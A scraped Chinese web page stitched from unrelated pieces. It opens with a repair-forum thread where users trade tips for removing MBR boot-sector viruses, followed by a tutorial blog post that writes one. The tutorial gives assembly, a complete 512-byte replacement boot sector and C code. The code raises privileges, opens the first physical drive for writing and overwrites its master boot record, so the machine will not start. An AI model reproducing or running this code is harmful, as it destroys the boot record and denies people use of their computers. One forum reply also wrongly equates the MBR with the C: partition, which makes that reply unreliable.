请教MBR病毒如何杀-迅维网维修论坛
只需一步，快速开始
后使用快捷导航没有帐号？
查看: 3138|回复: 36
请教MBR病毒如何杀
下载分243 分
原创币0 点
下载次数8 次
上传次数0 次
主题帖子积分
会员等级：
初学乍练, 积分 19, 距离下一级还需 11 积分
请教MBR病毒如何杀？
下载分7 分
原创币0 点
下载次数757 次
上传次数22 次
主题帖子积分
会员等级：
铜牌维客, 积分 150, 距离下一级还需 50 积分
那种病毒就算是分区一样是没用的只有重新用MHDD擦除后再分区就可以了
下载分2129 分
原创币1 点
下载次数300 次
上传次数68 次
主题帖子积分
会员等级：
银牌维客, 积分 249, 距离下一级还需 151 积分
进入PE系统，打开DiskGenius--&硬盘--&重建主引导记录(MBR)就行了。
下载分724 分
原创币0 点
下载次数143 次
上传次数44 次
主题帖子积分
会员等级：
正式维客, 积分 92, 距离下一级还需 28 积分
我是初学者，对2楼和3楼的方法似懂非懂，可以再说得明白一些吗？敬请赐教，谢谢。
下载分2058 分
原创币0 点
下载次数20 次
上传次数0 次
主题帖子积分
会员等级：
每天坚持学习一点点...就会有所收获...懂技术不如懂忽悠！
mbr的病毒其实很简单的，你只要进入pq分区工具，删除主要引导分区，重新建立主引导分区，然后激活主引导分区...格式化一下C盘就OK了！！！这是最简单的方法了！！！
下载分812 分
原创币0 点
下载次数186 次
上传次数2 次
主题帖子积分
会员等级：
正式维客, 积分 90, 距离下一级还需 30 积分
这前遇到过一台没搞掂
下载分812 分
原创币0 点
下载次数186 次
上传次数2 次
主题帖子积分
会员等级：
正式维客, 积分 90, 距离下一级还需 30 积分
楼主是不是南宁的？是不是搞我之前搞过的那台机{:soso_e120:}
下载分724 分
原创币0 点
下载次数143 次
上传次数44 次
主题帖子积分
会员等级：
正式维客, 积分 92, 距离下一级还需 28 积分
xiaoxia119 发表于
mbr的病毒其实很简单的，你只要进入pq分区工具，删除主要引导分区，重新建立主引导分区，然后激活主引导分区 ...
删除主要引导分区，重新建立主引导分区，然后激活主引导分区
请教：主引导分区就是安装操作系统的C盘分区？
是的，主引导分区就是安装操作系统的C盘！！！&
下载分2058 分
原创币0 点
下载次数20 次
上传次数0 次
主题帖子积分
会员等级：
每天坚持学习一点点...就会有所收获...懂技术不如懂忽悠！
manjianghong 发表于
删除主要引导分区，重新建立主引导分区，然后激活主引导分区
请教：主引导分区就是安装操作系统的C盘分 ...
是的，主引导分区就是安装操作系统的C盘！！！
下载分1466 分
原创币0 点
下载次数34 次
上传次数31 次
主题帖子积分
会员等级：
铜牌维客, 积分 144, 距离下一级还需 56 积分
记得杀软中金山、诺顿都能搞定来的
下载分1728 分
原创币0 点
下载次数349 次
上传次数72 次
主题帖子积分
会员等级：
铜牌维客, 积分 199, 距离下一级还需 1 积分
这让我不禁想起老师说过的一句话“输到用时方恨少”（小虾我故意写错字来调节调节气风哈小虾是卖弄派掌门哈大侠莫要惊慌看小虾给你个推荐哈包你药到病除哈）
这里首先小虾给大家先普及一个MBR哈
MBR叫做main boot record即主引导记录也就是说每一个初始化过的硬盘在初始化后都会在其硬盘的0扇区开始写这么一个记录其一般为2sec（扇区）而其中的组成为前446字节为主引导程序而后面的64字节则为对我们最最实用的分区表信息即我们硬盘在初始化后的分区结构表信息也就是说硬盘c盘有多大d盘有多大以及其各自的分区格式是什么以及其具体的引导顺序是什么样的都由这里进行设置所以这里我们只要对其后64字节进行保存重新写一个MBR信息然后将其后4字节进行替换即可达到目的，当然理论和实践总是有差距的所以对于广大电脑爱好者（不具备数据结构知识的各位菜鸟小虾们）我给出的建议是以下
针对MBR损坏或者中毒的建议：（不懂数据结构专业知识的哥们儿姐们儿们的推荐）
这里呢我们可以使用windows的dos中有一个很实用的命令即fdisk命在其下可输入fdisk \mbr命令来重新创建此MBR当然这样做的好处就是傻瓜型可以说是一键式不足呢是其会将原有的MBR进行了替换或者说是抹掉了原来的原纪录信息所以这里一定要强调坚决将先前备份的后64字节的分区表信息替换了新的MBR纪录
对于有一定专业数据结构知识的大侠们的推荐：
使用16位编辑器对MVR进行替换主要针对446字节（亲，你懂得。嘿嘿，偷笑中。）
最后呢我必须向各位大侠小虾们说一句祝您们好运哈小虾得撤了哈
下载分1728 分
原创币0 点
下载次数349 次
上传次数72 次
主题帖子积分
会员等级：
铜牌维客, 积分 199, 距离下一级还需 1 积分
J31你真厉害啊（嘿嘿偷笑中）（自吹自擂中）
下载分1728 分
原创币0 点
下载次数349 次
上传次数72 次
主题帖子积分
会员等级：
铜牌维客, 积分 199, 距离下一级还需 1 积分
回复的很好，但是，也不能灌水。
杀毒还要考虑，是否要保留数据。&
下载分1728 分
原创币0 点
下载次数349 次
上传次数72 次
主题帖子积分
会员等级：
铜牌维客, 积分 199, 距离下一级还需 1 积分
manjianghong 发表于
删除主要引导分区，重新建立主引导分区，然后激活主引导分区
请教：主引导分区就是安装操作系统的C盘分 ...
MBR纪录并不是安装在c盘即MBR安装在硬盘的0磁道其关系到硬盘的c盘但是却和c盘的存在以及c盘安装什么系统没有关系的哦
下载分18 分
原创币0 点
下载次数3 次
上传次数1 次
主题帖子积分
会员等级：
小小白, 积分 3, 距离下一级还需 7 积分
全盘移出重要数据，再全盘删除，再重分区
下载分790 分
原创币0 点
下载次数39 次
上传次数74 次
主题帖子积分
会员等级：
铜牌维客, 积分 164, 距离下一级还需 36 积分
用分区精灵 直接重建MBR
下载分126 分
原创币0 点
下载次数6 次
上传次数0 次
主题帖子积分
会员等级：
初学乍练, 积分 11, 距离下一级还需 19 积分
360系统急救箱就可以杀
下载分277 分
原创币0 点
下载次数106 次
上传次数54 次
主题帖子积分
会员等级：
见习维客, 积分 33, 距离下一级还需 37 积分
瑞星不知怎样
下载分75 分
原创币0 点
下载次数19 次
上传次数27 次
主题帖子积分
会员等级：
小小白, 积分 9, 距离下一级还需 1 积分
用diskgen 重写主引导记录，，或分区工具 重建mbr
下载分-2 分
原创币0 点
下载次数1 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 6, 距离下一级还需 4 积分
我知道可以用bootsect
远程培训学员
点击查看详情：
迅维培训办公室联系方式：电话6；QQ：
Powered by Discuz! X3.2 -wLicensed
& 2016 Comsenz Inc.MBR病毒查杀方法
导读：最近MBR病毒猖狂，中了这类病毒的主要症状是“杀毒不彻底，重装系统也不行”。在这里给大家介绍一下MBR病毒的查杀方法。工具/原料最新版360系统急救箱步骤/方法打开最新版360急救箱，等待更...
[ 责任编辑：gaosu ]
赞助商链接制作一个简单的MBR引导区病毒
这段时间一直再看病毒，但是刚刚开始看，水平比较低，到52去下了几个高端大气的样本回来，但是感觉真的好复杂，水平不够。于是就想说干嘛自己不写一下呢？看看是不是真的那么复杂。
因为看的都是引导区的病毒，所以就想先写一个简单的引导区病毒。之前在蒋老师的帖子上面受到了启发，于是就开始写了。。
我先介绍一下我这个样本的功能，就是让你开不了机，然后显示一串字符串就好了。
0x1，什么是MBR
MBR，就是硬盘的主引导记录，简而言之，就是先于操作系统拿到控制权。这类病毒是格式化硬盘之后任然存在的病毒。
0x2，病毒原理
&我这个毒，最多也就是简单的恶作剧，并没有起到什么攻击作用，所以我这个原理就简单了，并没有hook
int 13中断，也没有注入什么的，什么都没有。&
&所以首先第一步，我们只需要提升权限，然后打开"\\\\.\\PHYSICALDRIVE0"文件，为什么要打开这个文件呢？"\\\\.\\PHYSICALDRIVE0"文件表示本机的物理驱动器0(一般是主硬盘),我们的MBR就位于硬盘的0柱面0磁头1扇区，一共是200h字节，也就是512字节。
&那么我们改掉这段代码也就拿到了先于系统的控制权了，就可以做我们自己的事情了。
0x3，BIOS INT 10H中断
10h中断是BIOS对系统屏幕显示器所提供的服务程序。我们可以调用int10h中断来控制显示器的显示。
& 显示方式：
&AL=12 640&480 16色图形 (EGA)
AH = 13,功能号，表示显示字符串
ES:BP &指向串地址
CX: & &表示串的长度
DH, DL 分表表示起始的行列
BH: & &页号
AL = 0； BL表示属性（char， char）
0x4源码展示。
下面是汇编源码：
code segment
mov ax,12h
mov bp, 0000H
mov cx, 13h
mov ax,1301h
mov bx,0Ch
上面是汇编代码，编译链接之后可以将机器码拷贝出来。是下面这样的：
B8 12 00 CD 10 BD 00 00 B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD
这里一共有18h字节，从0开始就是17字节，我现在要将我要输出的字符加载后面也就是字符是从0x18开始的。
那么上面这一串代码被读到h去之后，字符应该是从7C18h开始的现在开始改代码了
B8 12 00 CD 10 BD 18 7C B9 13
00 B8 01 13 BB 0C 00 BA 00 00 CD 10 E2
FE&68 61 63 6B 65 64 20 62 79 20 4A 69 6E
47 75 69 5A 69
但是因为我们要写512个字节进去，而且最后两个字节必须是55AA，因为55AA是MBR的结束标志。
所以现在我们自己写的MBR必须是这样的。
char temp[512]= {
0xB8,0x12,0x00,0xCD,0x10,0xBD,0x18,0x7C,0xB9,0x13,00,0xB8,0x01,0x13,0xBB,0x0C,00,0xBA,00,00,0xCD,0x10,0xE2,0xFE,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x4A,0x69,0x6E,0x47,0x75,
0x69,0x5A,0x69,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x55,0xAA
好了，MBR准备好了。那么就来写主程序吧。
主程序也很简单，就两个函数，一个用来提权，一个用来写MBR。直接贴代码吧
char temp[512]= {
0xB8,0x12,0x00,0xCD,0x10,0xBD,0x18,0x7C,0xB9,0x13,00,0xB8,0x01,0x13,0xBB,0x0C,00,0xBA,00,00,0xCD,0x10,0xE2,0xFE,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x4A,0x69,0x6E,0x47,0x75,
0x69,0x5A,0x69,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x55,0xAA
//自己写一个函数来提权。
void GetPrivileges()
//定义一个PLUID
HANDLE hTokenH
TOKEN_PRIVILEGES&
//获取当前进程的句柄
hProcess = GetCurrentProcess();
OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY, &hTokenHandle);
//函数查看系统权限的特权值，返回信息到一个LUID结构体里。
tp.PrivilegeCount =1;&
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);&
tp.Privileges[0].Attributes
=SE_PRIVILEGE_ENABLED;&
AdjustTokenPrivileges(hTokenHandle,FALSE,&tp,sizeof(tp),NULL,NULL);&
CloseHandle(hTokenHandle);
CloseHandle(hProcess);
//下面的函数来读取"\\\\.\\PHYSICALDRIVE0"
void ReadPHYSICALDRIVE0()
DWORD dwReadS
// char lpBuffer[512];
//使用createFile打开这个文件
char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
hFile = CreateFile(str_Name, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL ,0);
if (hFile == INVALID_HANDLE_VALUE)
MessageBox(0, "wrong", "wrong", 0);
//用readfile来读取文件
& & WriteFile(hFile, temp,
512, &dwReadSize, NULL);
int main()
GetPrivileges();
ReadPHYSICALDRIVE0();
中毒之后的效果是这样的;
然后开不了机了。
在虚拟机里面恢复备份就可以了。
现在一个简单的MBR病毒就写好了。嘿嘿嘿。其实这个有点模仿别人的意思。但是自己写一次的话也确实有学习到很多东西。
比如我遇到的问题是如何将汇编代码编程机器码，于是我就想办法，把程序编译连接之后，再拖到C32里面将代码段复制出来，然后再在后面添加上字符串。。。。
希望下次自己熟练之后可以写一个更好的出来
加油！金龟子
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。